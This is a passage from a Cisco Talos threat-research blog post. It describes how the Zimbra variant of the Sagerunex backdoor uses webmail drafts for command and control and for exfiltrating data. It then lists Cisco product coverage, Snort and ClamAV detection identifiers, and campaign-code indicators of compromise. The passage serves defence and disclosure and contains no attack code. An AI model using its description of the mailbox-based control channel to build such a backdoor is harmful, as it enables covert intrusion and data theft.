The Zimbra webmail version of Sagerunex is not only designed to collect victim information and send it to the Zimbra mailbox but also to allow the actor to use Zimbra mail content to give orders and control the victim machine. If there is a legitimate command order content in the mail box, the backdoor will download the content and extract the command, otherwise the backdoor will delete the content and wait for a legitimate command. Once finished executing the command, the backdoor will package the command result and also save the data as “mail_report.rar”. The rar file is being attached to a draft email the user’s email account trash folder. 

 

Fig. The left side is the Zimbra status path, and the right side are the backdoor command functions.  

Talos observed that this version of the Sagerunex backdoor has been active since 2019, and there are still several Zimbra mailboxes receiving the compromised machine beacon information.  

 

The Zimbra version of Sagerunex backdoor infection chain is visualized below. 

Coverage 

 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here. 

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 64511, 64510, 64509. 

ClamAV detections are also available for this threat: 

Win.Backdoor.Sagerunex-10041845-0 

Win.Tool.Mtrain-10041846-0 

Win.Tool.Ntfsdump-10041854-0 

Win.Backdoor.Sagerunex-10041857-0 

 

Indicators of compromise (IOCs) 

Campaign code 

 st
qaz
test
cmhk
dtemp
0305
4007
4007_new
Jf_b64_t1
Ber_64
0817-svc64
NSX32-0710
Nsx32-0419
NJX32-0710
WS1x321014
pccw-svc32
CTMsx32-0712

IOCs for this research can also be found at our GitHub repository here. 

Cisco Talos Blog – ​Read More